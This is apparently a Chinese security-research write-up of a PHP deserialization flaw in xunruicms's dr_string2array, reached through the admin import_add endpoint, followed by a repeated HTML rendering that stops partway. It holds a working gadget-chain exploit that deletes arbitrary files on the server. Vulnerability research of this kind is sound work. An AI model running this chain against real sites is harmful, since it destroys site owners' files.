在没有登录的情况下会跳转到登录入口所以要先登录管理员账号可以通过下断点查看有没有执行到import\_add方法
```php
POST ?/admin3a609e1d6cff.php?c=field&amp;m=import_add
code = xxxx
```
利用链寻找
-----
第一步寻找`__destruct()`方法只有5个一个一个找
![image-20230712102701002](https://shs3.b.qianxin.com/attack_forum/2024/03/attach-63a062ea097ba84e4d3d7f93e83f71fa99590a7e.png)
第一个
```php
public function __destruct()
&nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp;if ($this-&gt;memcached instanceof Memcached) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;memcached-&gt;quit();
&nbsp; &nbsp; &nbsp; } elseif ($this-&gt;memcached instanceof Memcache) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;memcached-&gt;close();
&nbsp; &nbsp; &nbsp; }
&nbsp; }
```
这个`$this-&gt;memcached`可控但是要是Memcached 或 Memcached的实例 ,操作空间不大 pass
第二个
```php
public function __destruct()
&nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp;if (is_resource($this-&gt;SMTPConnect)) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$this-&gt;sendCommand('quit');
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; } catch (ErrorException $e) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$protocol = $this-&gt;getProtocol();
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;$method &nbsp; = 'sendWith' . ucfirst($protocol);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;log_message('error', 'Email: ' . $method . ' throwed ' . $e);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; }
&nbsp; }
```
`$this-&gt;SMTPConnect`可控,但是要是一个资源类型,后面进入`sendCommand`方法,里面操作空间不大 pass
第三个
```php
public function __destruct()
{
if (isset($this-&gt;scratch)) {
self::wipeDirectory($this-&gt;scratch);
$this-&gt;scratch = null;
}
}
```
这个会调用`self::wipeDirectory` ,`$this-&gt;scratch`可控,跟进查看
```php
private static function wipeDirectory(string $directory): void
{
if (is_dir($directory)) {
// Try a few times in case of lingering locks
$attempts = 10;
while ((bool) $attempts &amp;&amp; ! delete_files($directory, true, false, true)) {
// @codeCoverageIgnoreStart
$attempts--;
usleep(100000); // .1s
// @codeCoverageIgnoreEnd
}
@rmdir($directory);
}
}
```
这里调用了`delete_files`似乎可以进行文件删除,继续跟进`delete_files`
```php
//\xunruicms\dayrui\CodeIgniter\System\Helpers\filesystem_helper.php
function delete_files(string $path, bool $delDir = false, bool $htdocs = false, bool $hidden = false): bool
{
$path = realpath($path) ?: $path;
$path = rtrim($path, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
try {
foreach (new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::CHILD_FIRST
) as $object) {
$filename = $object-&gt;getFilename();
if (! $hidden &amp;&amp; $filename[0] === '.') {
continue;
}
if (! $htdocs || ! preg_match('/^(\.htaccess|index\.(html|htm|php)|web\.config)$/i', $filename)) {
$isDir = $object-&gt;isDir();
if ($isDir &amp;&amp; $delDir) {
rmdir($object-&gt;getPathname());
continue;
}
if (! $isDir) {
unlink($object-&gt;getPathname());
}
}
}
return true;
} catch (Throwable $e) {
return false;
}
}
```
1. 首先,使用 `realpath($path) ?: $path` 将传入的 `$path` 转换为绝对路径,如果转换失败,则保留原始路径。
2. 然后,使用 `rtrim($path, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR` 将路径末尾的目录分隔符删除,并在末尾添加一个目录分隔符。
3. 接下来,使用`RecursiveDirectoryIterator`
类和`RecursiveIteratorIterator`
类遍历指定路径下的所有文件和目录。
- `RecursiveDirectoryIterator` 用于递归地遍历目录,并跳过 "." 和 ".." 目录。
- `RecursiveIteratorIterator` 使用 `CHILD_FIRST` 模式,确保先处理子目录中的文件和目录,然后再处理父目录中的文件和目录。
4. 对于遍历到的每个文件或目录`$object`执行以下操作:
- 获取文件名 `$filename = $object-&gt;getFilename()`。
- 如果 `$hidden` 为 `false`,并且文件名以 `.` 开头,则跳过当前循环,不处理该文件。
- 如果 `$htdocs` 为 `true`,并且文件名匹配 `.htaccess`、`index.html`、`index.htm`、`index.php` 和 `web.config` 则跳过当前循环,不处理该文件。
- 检查文件类型:
- 如果是目录且 `$delDir` 为 `true`,则使用 `rmdir($object-&gt;getPathname())` 删除目录,并继续下一次循环。
- 如果不是目录,则使用 `unlink($object-&gt;getPathname())` 删除文件。
5. 循环结束后,返回 `true` 表示删除操作成功。
6. 如果在删除过程中发生任何异常(`Throwable`),则捕获异常,并返回 `false` 表示删除操作失败。
写poc试了一下发现没有在`wipeDirectory`中没有进入`delete_files`中,报错了,函数导向错误
![image-20230712111020382](https://shs3.b.qianxin.com/attack_forum/2024/03/attach-790663103089d74f4160d55c987483ac27107dae.png)
因为`delete_files`并不存在于某个类里面,只是一个函数,要利用这个方法需要引用它所在的文件,利用的类里面已经引用了这个文件,就是不跳转
TT^TT
第四个
```php
public function __destruct()
{
unset($this-&gt;data);
unset($this-&gt;cache);
unset($this-&gt;ret);
unset($this-&gt;icon);
unset($this-&gt;result_array);
unset($this-&gt;nbsp_str);
unset($this-&gt;nbsp);
unset($this-&gt;result);
}
```
这个只是用来释放变量,没操作空间 pass
第五个
```php
public function __destruct()
{
if (isset($this-&gt;redis)) {
$this-&gt;redis-&gt;close();
}
}
```
这个`$this-&gt;redis`可控,这里有两个方向,一个触发某个类的`__call()` , 另外一个是找到一个含有`close()`方法的类
经过一番查找,没有找到能利用的**\_\_call()** 只好去看看close()了
全局搜索close()方法找到了15个方法其中有7个是js文件的忽略
![image-20230712114207860](https://shs3.b.qianxin.com/attack_forum/2024/03/attach-24b6997c856c984879d2174e6540d27fa6dfb033.png)
经过一番查找,找到这个可以用
```php
//\xunruicms\dayrui\CodeIgniter\System\Session\Handlers\MemcachedHandler.php
public function close(): bool
{
if (isset($this-&gt;memcached)) {
if (isset($this-&gt;lockKey)) {
$this-&gt;memcached-&gt;delete($this-&gt;lockKey);
}
if (! $this-&gt;memcached-&gt;quit()) {
return false;
}
$this-&gt;memcached = null;
return true;
}
return false;
}
```
这里的`$this-&gt;memcached`和`$this-&gt;lockKey`都可控,这里也可以触发任意类的`__call`方法,也可以触发任意类的`delete()`和`quit()`方法
这里优先选择`delete()` ,因为其参数`$this-&gt;lockKey`可控
全局搜索`delete()`方法,找到这个
```php
public function delete() {
@unlink($this-&gt;fullname);
}
```
`$this-&gt;fullname`可控,这里可以任意文件删除了,但是这是无参数方法,不能跳转到这利用
还一个:
```php
//\xunruicms\dayrui\CodeIgniter\System\Cache\Handlers\FileHandler.php
public function delete(string $key)
{
$key = static::validateKey($key, $this-&gt;prefix);
return is_file($this-&gt;path . $key) &amp;&amp; unlink($this-&gt;path . $key);
}
```
其中$key是上面传来的参数`$this-&gt;lockKey` 并且`$this-&gt;prefix`和`$this-&gt;path`也可控 ,可以看到后面会将`$this-&gt;path`和`$key`进行拼接,进行判断是否是文件,如果是文件则调用`unlink`方法进行文件删除
现在主要关注`validateKey`方法对$key的处理
```php
public static function validateKey($key, $prefix = ''): string
{
if (! is_string($key)) {
throw new InvalidArgumentException('Cache key must be a string');
}
if ($key === '') {
throw new InvalidArgumentException('Cache key cannot be empty.');
}
$reserved = config('Cache')-&gt;reservedCharacters ?? self::RESERVED_CHARACTERS;
if ($reserved &amp;&amp; strpbrk($key, $reserved) !== false) {
throw new InvalidArgumentException('Cache key contains reserved characters ' . $reserved);
}
// If the key with prefix exceeds the length then return the hashed version
return strlen($prefix . $key) &gt; static::MAX_KEY_LENGTH ? $prefix . md5($key) : $prefix . $key;
}
```
这个方法,在确保传入的$key不为空并且是字符串的前提下才能正常进行下面操作
```php
$reserved = config('Cache')-&gt;reservedCharacters ?? self::RESERVED_CHARACTERS;
```
获取配置中的保留字符列表。如果 `config('Cache')-&gt;reservedCharacters` 存在,则将其赋值给 `$reserved`;否则,使用 `self::RESERVED_CHARACTERS` 的默认值。
```php
public string $reservedCharacters = '{}()/\\@:';
```
```php
return strlen($prefix . $key) &gt; static::MAX_KEY_LENGTH ? $prefix . md5($key) : $prefix . $key;
```
- 首先,计算添加前缀后键的长度是否大于预定义的最大键长度 `static::MAX_KEY_LENGTH`。
- 如果大于最大键长度,则返回将 `$prefix . md5($key)` 处理后的哈希值作为缓存键。这是为了确保最终返回的键不会超过最大键长度。
- 如果小于等于最大键长度,则返回将 `$prefix . $key` 拼接作为缓存键
经过测试在delete方法中如果传入`$key`为要删除的文件名,在经过`validateKey`处理后不会对key照常改变直接返回`key`,而`$this-&gt;prefix`不需要修改,默认就行
在拼接文件路径的`$this-&gt;path` 可以是绝对路径也可以是相对路径默认是public目录下
在写exp的过程中遇到一个问题就是类的属性都是`protected`类型的,不能直接修改值
因为这个cms安装条件是PHP7.4+ , 由于`PHP7.1+`对属性类型不敏感 可以将`protected`修改为`public`类型
最后的exp
------
```php
//任意文件删除
&lt;?php
namespace CodeIgniter\Cache\Handlers;
use CodeIgniter\Session\Handlers\BaseHandler;
use CodeIgniter\Session\Handlers\MemcachedHandler;
class RedisHandler extends BaseHandler
{
public $redis;
public function __construct()
{
$this-&gt;redis =new MemcachedHandler();
}
}
namespace CodeIgniter\Session\Handlers;
use CodeIgniter\Session\Handlers\BaseHandler;
use CodeIgniter\Cache\Handlers\FileHandler;
class MemcachedHandler extends BaseHandler
{
public $memcached ;
public $lockKey ;
public function __construct()
{
$this-&gt;memcached=new FileHandler();
$this-&gt;lockKey = "1.txt"; //文件名
}
}
namespace CodeIgniter\Session\Handlers;
abstract class BaseHandler
{
}
namespace CodeIgniter\Cache\Handlers;
use CodeIgniter\Session\Handlers\BaseHandler;
class FileHandler extends BaseHandler
{
public $path;
public function __construct()
{
$this-&gt;path="./"; //路径
}
}
use CodeIgniter\Cache\Handlers\RedisHandler;
$str = serialize(new RedisHandler());
$newStr = str\_replace('\\', '\\\\', $str);
echo urlencode($newStr)."\n";
```
END
---</textarea>
<div id=layer-photos-demo>
<div id=md_view><div class=markdown-body><h2 blockindex=0>测试环境</h2>
<p blockindex=1>V 4.6.2 (似乎小于这个版本的都行)</p>
<h2 blockindex=2>漏洞点</h2>
<pre blockindex=3><code class="hljs language-php">\xunruicms\dayrui\Fcms\Core\Helper.php
</code></pre>
<pre blockindex=4><code class="hljs language-php"><span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>dr_string2array</span>(<span class=hljs-params><span class=hljs-variable>$data</span>, <span class=hljs-variable>$limit</span> = <span class=hljs-string>''</span></span>) </span>{
&nbsp; &nbsp;<span class=hljs-keyword>if</span> (!<span class=hljs-variable>$data</span>) {
&nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-keyword>return</span> [];
&nbsp; } <span class=hljs-keyword>elseif</span> (is_array(<span class=hljs-variable>$data</span>)) {
&nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-variable>$rt</span> = <span class=hljs-variable>$data</span>;
&nbsp; } <span class=hljs-keyword>else</span> {
&nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-variable>$rt</span> = json_decode(<span class=hljs-variable>$data</span>, <span class=hljs-literal>true</span>);
&nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-keyword>if</span> (!<span class=hljs-variable>$rt</span>) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-variable>$rt</span> = unserialize(stripslashes(<span class=hljs-variable>$data</span>));
&nbsp; &nbsp; &nbsp; }
&nbsp; }
&nbsp; &nbsp;<span class=hljs-keyword>if</span> (is_array(<span class=hljs-variable>$rt</span>) &amp;&amp; <span class=hljs-variable>$limit</span>) {
&nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-keyword>return</span> dr_arraycut(<span class=hljs-variable>$rt</span>, <span class=hljs-variable>$limit</span>);
&nbsp; }
&nbsp; &nbsp;<span class=hljs-keyword>return</span> <span class=hljs-variable>$rt</span>;
}
</code></pre>
<p blockindex=5>这里的<strong>unserialize</strong>函数里面存在一个<code>stripslashes</code>函数,这个可以绕过,只有将$data中的<code>\</code>修改为<code>\\</code>即可,在此之前,需要解决</p>
<p blockindex=6><code>json_decode</code>的问题正常的json字符串会被解析然后返回解析的值如果传入的是不正常的字符串它会解析失败返回false然后才能进入<code>unserialize</code></p>
<p blockindex=7>在这个过程中,$data并没有其他过多的检查从而造成了反序列化漏洞</p>
<h2 blockindex=8>传参入口寻找</h2>
<p blockindex=9>为了能够利用这个unserialize函数必须找到$data的输入点ALT+F7搜索<code>dr_string2array</code>函数,找到了许多结果</p>
<p blockindex=10><img src="
<p blockindex=11>找了很多,发现只有这个函数操作性比较强,其他的调用有许多是不可控的,或者是过滤</p>
<pre blockindex=12><code class="hljs language-php">xunruicms\dayrui\Fcms\Control\Admin\Field.php
</code></pre>
<p blockindex=13><img src="
<p blockindex=14>看看这个<code>import_add</code>方法</p>
<p blockindex=15>首先先判断是不是post请求进入if语句然后接收一个post参数code 然后通过<code>\r\n</code>对字符串进行分割,变为数组</p>
<p blockindex=16>如果post的code有数值就不会进入if(!$arr), 绕后就遍历这个数组,把数组中的每一个数值都传到<code>dr_string2array</code>中,然后就是触发反序列化</p>
<p blockindex=17>下一个问题,如何才能进入这个<code>import_add</code>函数呢</p>
<p blockindex=18>在路由解析的过程中会接收两个参数,<code>c</code><code>m</code> 其中c获取的是类名m获取的是方法名 ,获取之后会调用对应方法</p>
<p blockindex=19>尝试访问</p>
<pre blockindex=20><code class="hljs language-php">http:<span class=hljs-comment>//127.0.0.1/?c=field&amp;m=import_add</span>
</code></pre>
<p blockindex=21>出现404</p>
<p blockindex=22>观察一下目录因为这个field类在Admin目录里面的,可能要访问admin.php</p>
<pre blockindex=23><code class="hljs language-php">http:<span class=hljs-comment>//127.0.0.1/admin3a609e1d6cff.php?c=field&amp;m=import_add</span>
</code></pre>
<p blockindex=24>在没有登录的情况下会跳转到登录入口所以要先登录管理员账号可以通过下断点查看有没有执行到import_add方法</p>
<pre blockindex=25><code class="hljs language-php">POST ?/admin3a609e1d6cff.php?c=field&amp;m=import_add
code = xxxx
</code></pre>
<h2 blockindex=26>利用链寻找</h2>
<p blockindex=27>第一步寻找<code>__destruct()</code>方法只有5个一个一个找</p>
<p blockindex=28><img src=
<p blockindex=29>第一个</p>
<pre blockindex=30><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>__destruct</span>(<span class=hljs-params></span>)
&nbsp; </span>{
&nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-keyword>if</span> (<span class=hljs-keyword>$this</span>-&gt;memcached <span class=hljs-keyword>instanceof</span> Memcached) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-keyword>$this</span>-&gt;memcached-&gt;quit();
&nbsp; &nbsp; &nbsp; } <span class=hljs-keyword>elseif</span> (<span class=hljs-keyword>$this</span>-&gt;memcached <span class=hljs-keyword>instanceof</span> Memcache) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-keyword>$this</span>-&gt;memcached-&gt;close();
&nbsp; &nbsp; &nbsp; }
&nbsp; }
</code></pre>
<p blockindex=31>这个<code>$this-&gt;memcached</code>可控但是要是Memcached 或 Memcached的实例 ,操作空间不大 pass</p>
<p blockindex=32>第二个</p>
<pre blockindex=33><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>__destruct</span>(<span class=hljs-params></span>)
&nbsp; </span>{
&nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-keyword>if</span> (is_resource(<span class=hljs-keyword>$this</span>-&gt;SMTPConnect)) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-keyword>try</span> {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-keyword>$this</span>-&gt;sendCommand(<span class=hljs-string>'quit'</span>);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; } <span class=hljs-keyword>catch</span> (<span class=hljs-built_in>ErrorException</span> <span class=hljs-variable>$e</span>) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-variable>$protocol</span> = <span class=hljs-keyword>$this</span>-&gt;getProtocol();
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class=hljs-variable>$method</span> &nbsp; = <span class=hljs-string>'sendWith'</span> . ucfirst(<span class=hljs-variable>$protocol</span>);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;log_message(<span class=hljs-string>'error'</span>, <span class=hljs-string>'Email: '</span> . <span class=hljs-variable>$method</span> . <span class=hljs-string>' throwed '</span> . <span class=hljs-variable>$e</span>);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; }
&nbsp; }
</code></pre>
<p blockindex=34><code>$this-&gt;SMTPConnect</code>可控,但是要是一个资源类型,后面进入<code>sendCommand</code>方法,里面操作空间不大 pass</p>
<p blockindex=35>第三个</p>
<pre blockindex=36><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>__destruct</span>(<span class=hljs-params></span>)
</span>{
<span class=hljs-keyword>if</span> (<span class=hljs-keyword>isset</span>(<span class=hljs-keyword>$this</span>-&gt;scratch)) {
<span class=hljs-built_in>self</span>::wipeDirectory(<span class=hljs-keyword>$this</span>-&gt;scratch);
<span class=hljs-keyword>$this</span>-&gt;scratch = <span class=hljs-literal>null</span>;
}
}
</code></pre>
<p blockindex=37>这个会调用<code>self::wipeDirectory</code> ,<code>$this-&gt;scratch</code>可控,跟进查看</p>
<pre blockindex=38><code class="hljs language-php"><span class=hljs-keyword>private</span> <span class=hljs-built_in>static</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>wipeDirectory</span>(<span class=hljs-params><span class=hljs-keyword>string</span> <span class=hljs-variable>$directory</span></span>): <span class=hljs-title>void</span>
</span>{
<span class=hljs-keyword>if</span> (is_dir(<span class=hljs-variable>$directory</span>)) {
<span class=hljs-comment>// Try a few times in case of lingering locks </span>
<span class=hljs-variable>$attempts</span> = <span class=hljs-number>10</span>;
<span class=hljs-keyword>while</span> ((<span class=hljs-keyword>bool</span>) <span class=hljs-variable>$attempts</span> &amp;&amp; ! delete_files(<span class=hljs-variable>$directory</span>, <span class=hljs-literal>true</span>, <span class=hljs-literal>false</span>, <span class=hljs-literal>true</span>)) {
<span class=hljs-comment>// @codeCoverageIgnoreStart </span>
<span class=hljs-variable>$attempts</span>--;
usleep(<span class=hljs-number>100000</span>); <span class=hljs-comment>// .1s </span>
<span class=hljs-comment>// @codeCoverageIgnoreEnd </span>
}
@rmdir(<span class=hljs-variable>$directory</span>);
}
}
</code></pre>
<p blockindex=39>这里调用了<code>delete_files</code>似乎可以进行文件删除,继续跟进<code>delete_files</code></p>
<pre blockindex=40><code class="hljs language-php"><span class=hljs-comment>//\xunruicms\dayrui\CodeIgniter\System\Helpers\filesystem_helper.php </span>
<span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>delete_files</span>(<span class=hljs-params><span class=hljs-keyword>string</span> <span class=hljs-variable>$path</span>, <span class=hljs-keyword>bool</span> <span class=hljs-variable>$delDir</span> = <span class=hljs-literal>false</span>, <span class=hljs-keyword>bool</span> <span class=hljs-variable>$htdocs</span> = <span class=hljs-literal>false</span>, <span class=hljs-keyword>bool</span> <span class=hljs-variable>$hidden</span> = <span class=hljs-literal>false</span></span>): <span class=hljs-title>bool</span>
</span>{
<span class=hljs-variable>$path</span> = realpath(<span class=hljs-variable>$path</span>) ?: <span class=hljs-variable>$path</span>;
<span class=hljs-variable>$path</span> = rtrim(<span class=hljs-variable>$path</span>, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
<span class=hljs-keyword>try</span> {
<span class=hljs-keyword>foreach</span> (<span class=hljs-keyword>new</span> <span class=hljs-built_in>RecursiveIteratorIterator</span>(
<span class=hljs-keyword>new</span> <span class=hljs-built_in>RecursiveDirectoryIterator</span>(<span class=hljs-variable>$path</span>, <span class=hljs-built_in>RecursiveDirectoryIterator</span>::SKIP_DOTS),
<span class=hljs-built_in>RecursiveIteratorIterator</span>::CHILD_FIRST
) <span class=hljs-keyword>as</span> <span class=hljs-variable>$object</span>) {
<span class=hljs-variable>$filename</span> = <span class=hljs-variable>$object</span>-&gt;getFilename();
<span class=hljs-keyword>if</span> (! <span class=hljs-variable>$hidden</span> &amp;&amp; <span class=hljs-variable>$filename</span>[<span class=hljs-number>0</span>] === <span class=hljs-string>'.'</span>) {
<span class=hljs-keyword>continue</span>;
}
<span class=hljs-keyword>if</span> (! <span class=hljs-variable>$htdocs</span> || ! preg_match(<span class=hljs-string>'/^(\.htaccess|index\.(html|htm|php)|web\.config)$/i'</span>, <span class=hljs-variable>$filename</span>)) {
<span class=hljs-variable>$isDir</span> = <span class=hljs-variable>$object</span>-&gt;isDir();
<span class=hljs-keyword>if</span> (<span class=hljs-variable>$isDir</span> &amp;&amp; <span class=hljs-variable>$delDir</span>) {
rmdir(<span class=hljs-variable>$object</span>-&gt;getPathname());
<span class=hljs-keyword>continue</span>;
}
<span class=hljs-keyword>if</span> (! <span class=hljs-variable>$isDir</span>) {
unlink(<span class=hljs-variable>$object</span>-&gt;getPathname());
}
}
}
<span class=hljs-keyword>return</span> <span class=hljs-literal>true</span>;
} <span class=hljs-keyword>catch</span> (<span class=hljs-built_in>Throwable</span> <span class=hljs-variable>$e</span>) {
<span class=hljs-keyword>return</span> <span class=hljs-literal>false</span>;
}
}
</code></pre>
<ol blockindex=41>
<li>
<p>首先,使用 <code>realpath($path) ?: $path</code> 将传入的 <code>$path</code> 转换为绝对路径,如果转换失败,则保留原始路径。</p>
</li>
<li>
<p>然后,使用 <code>rtrim($path, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR</code> 将路径末尾的目录分隔符删除,并在末尾添加一个目录分隔符。</p>
</li>
<li>
<p>接下来,使用<code>RecursiveDirectoryIterator</code></p>
<p>类和<code>RecursiveIteratorIterator</code></p>
<p>类遍历指定路径下的所有文件和目录。</p>
<ul>
<li><code>RecursiveDirectoryIterator</code> 用于递归地遍历目录,并跳过 "." 和 ".." 目录。</li>
<li><code>RecursiveIteratorIterator</code> 使用 <code>CHILD_FIRST</code> 模式,确保先处理子目录中的文件和目录,然后再处理父目录中的文件和目录。</li>
</ul>
</li>
<li>
<p>对于遍历到的每个文件或目录<code>$object</code>执行以下操作:</p>
<ul>
<li>
<p>获取文件名 <code>$filename = $object-&gt;getFilename()</code></p>
</li>
<li>
<p>如果 <code>$hidden</code><code>false</code>,并且文件名以 <code>.</code> 开头,则跳过当前循环,不处理该文件。</p>
</li>
<li>
<p>如果 <code>$htdocs</code><code>true</code>,并且文件名匹配 <code>.htaccess</code><code>index.html</code><code>index.htm</code><code>index.php</code><code>web.config</code> 则跳过当前循环,不处理该文件。</p>
</li>
<li>
<p>检查文件类型:</p>
<ul>
<li>如果是目录且 <code>$delDir</code><code>true</code>,则使用 <code>rmdir($object-&gt;getPathname())</code> 删除目录,并继续下一次循环。</li>
<li>如果不是目录,则使用 <code>unlink($object-&gt;getPathname())</code> 删除文件。</li>
</ul>
</li>
</ul>
</li>
<li>
<p>循环结束后,返回 <code>true</code> 表示删除操作成功。</p>
</li>
<li>
<p>如果在删除过程中发生任何异常(<code>Throwable</code>),则捕获异常,并返回 <code>false</code> 表示删除操作失败。</p>
</li>
</ol>
<p blockindex=42>写poc试了一下发现没有在<code>wipeDirectory</code>中没有进入<code>delete_files</code>中,报错了,函数导向错误</p>
<p blockindex=43><img src="
<p blockindex=44>因为<code>delete_files</code>并不存在于某个类里面,只是一个函数,要利用这个方法需要引用它所在的文件,利用的类里面已经引用了这个文件,就是不跳转</p>
<p blockindex=45>TT^TT</p>
<p blockindex=46>第四个</p>
<pre blockindex=47><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>__destruct</span>(<span class=hljs-params></span>)
</span>{
<span class=hljs-keyword>unset</span>(<span class=hljs-keyword>$this</span>-&gt;data);
<span class=hljs-keyword>unset</span>(<span class=hljs-keyword>$this</span>-&gt;cache);
<span class=hljs-keyword>unset</span>(<span class=hljs-keyword>$this</span>-&gt;ret);
<span class=hljs-keyword>unset</span>(<span class=hljs-keyword>$this</span>-&gt;icon);
<span class=hljs-keyword>unset</span>(<span class=hljs-keyword>$this</span>-&gt;result_array);
<span class=hljs-keyword>unset</span>(<span class=hljs-keyword>$this</span>-&gt;nbsp_str);
<span class=hljs-keyword>unset</span>(<span class=hljs-keyword>$this</span>-&gt;nbsp);
<span class=hljs-keyword>unset</span>(<span class=hljs-keyword>$this</span>-&gt;result);
}
</code></pre>
<p blockindex=48>这个只是用来释放变量,没操作空间 pass</p>
<p blockindex=49>第五个</p>
<pre blockindex=50><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>__destruct</span>(<span class=hljs-params></span>)
</span>{
<span class=hljs-keyword>if</span> (<span class=hljs-keyword>isset</span>(<span class=hljs-keyword>$this</span>-&gt;redis)) {
<span class=hljs-keyword>$this</span>-&gt;redis-&gt;close();
}
}
</code></pre>
<p blockindex=51>这个<code>$this-&gt;redis</code>可控,这里有两个方向,一个触发某个类的<code>__call()</code> , 另外一个是找到一个含有<code>close()</code>方法的类</p>
<p blockindex=52>经过一番查找,没有找到能利用的**__call()** 只好去看看close()了</p>
<p blockindex=53>全局搜索close()方法找到了15个方法其中有7个是js文件的忽略</p>
<p blockindex=54><img src=
<p blockindex=55>经过一番查找,找到这个可以用</p>
<pre blockindex=56><code class="hljs language-php"><span class=hljs-comment>//\xunruicms\dayrui\CodeIgniter\System\Session\Handlers\MemcachedHandler.php </span>
<span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>close</span>(<span class=hljs-params></span>): <span class=hljs-title>bool</span>
</span>{
<span class=hljs-keyword>if</span> (<span class=hljs-keyword>isset</span>(<span class=hljs-keyword>$this</span>-&gt;memcached)) {
<span class=hljs-keyword>if</span> (<span class=hljs-keyword>isset</span>(<span class=hljs-keyword>$this</span>-&gt;lockKey)) {
<span class=hljs-keyword>$this</span>-&gt;memcached-&gt;delete(<span class=hljs-keyword>$this</span>-&gt;lockKey);
}
<span class=hljs-keyword>if</span> (! <span class=hljs-keyword>$this</span>-&gt;memcached-&gt;quit()) {
<span class=hljs-keyword>return</span> <span class=hljs-literal>false</span>;
}
<span class=hljs-keyword>$this</span>-&gt;memcached = <span class=hljs-literal>null</span>;
<span class=hljs-keyword>return</span> <span class=hljs-literal>true</span>;
}
<span class=hljs-keyword>return</span> <span class=hljs-literal>false</span>;
}
</code></pre>
<p blockindex=57>这里的<code>$this-&gt;memcached</code><code>$this-&gt;lockKey</code>都可控,这里也可以触发任意类的<code>__call</code>方法,也可以触发任意类的<code>delete()</code><code>quit()</code>方法</p>
<p blockindex=58>这里优先选择<code>delete()</code> ,因为其参数<code>$this-&gt;lockKey</code>可控</p>
<p blockindex=59>全局搜索<code>delete()</code>方法,找到这个</p>
<pre blockindex=60><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>delete</span>(<span class=hljs-params></span>) </span>{
@unlink(<span class=hljs-keyword>$this</span>-&gt;fullname);
}
</code></pre>
<p blockindex=61><code>$this-&gt;fullname</code>可控,这里可以任意文件删除了,但是这是无参数方法,不能跳转到这利用</p>
<p blockindex=62>还一个:</p>
<pre blockindex=63><code class="hljs language-php"><span class=hljs-comment>//\xunruicms\dayrui\CodeIgniter\System\Cache\Handlers\FileHandler.php </span>
<span class=hljs-keyword>public</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>delete</span>(<span class=hljs-params><span class=hljs-keyword>string</span> <span class=hljs-variable>$key</span></span>)
</span>{
<span class=hljs-variable>$key</span> = <span class=hljs-built_in>static</span>::validateKey(<span class=hljs-variable>$key</span>, <span class=hljs-keyword>$this</span>-&gt;prefix);
<span class=hljs-keyword>return</span> is_file(<span class=hljs-keyword>$this</span>-&gt;path . <span class=hljs-variable>$key</span>) &amp;&amp; unlink(<span class=hljs-keyword>$this</span>-&gt;path . <span class=hljs-variable>$key</span>);
}
</code></pre>
<p blockindex=64>其中$key是上面传来的参数<code>$this-&gt;lockKey</code> 并且<code>$this-&gt;prefix</code><code>$this-&gt;path</code>也可控 ,可以看到后面会将<code>$this-&gt;path</code><code>$key</code>进行拼接,进行判断是否是文件,如果是文件则调用<code>unlink</code>方法进行文件删除</p>
<p blockindex=65>现在主要关注<code>validateKey</code>方法对$key的处理</p>
<pre blockindex=66><code class="hljs language-php"><span class=hljs-keyword>public</span> <span class=hljs-built_in>static</span> <span class=hljs-function><span class=hljs-keyword>function</span> <span class=hljs-title>validateKey</span>(<span class=hljs-params><span class=hljs-variable>$key</span>, <span class=hljs-variable>$prefix</span> = <span class=hljs-string>''</span></span>): <span class=hljs-title>string</span>
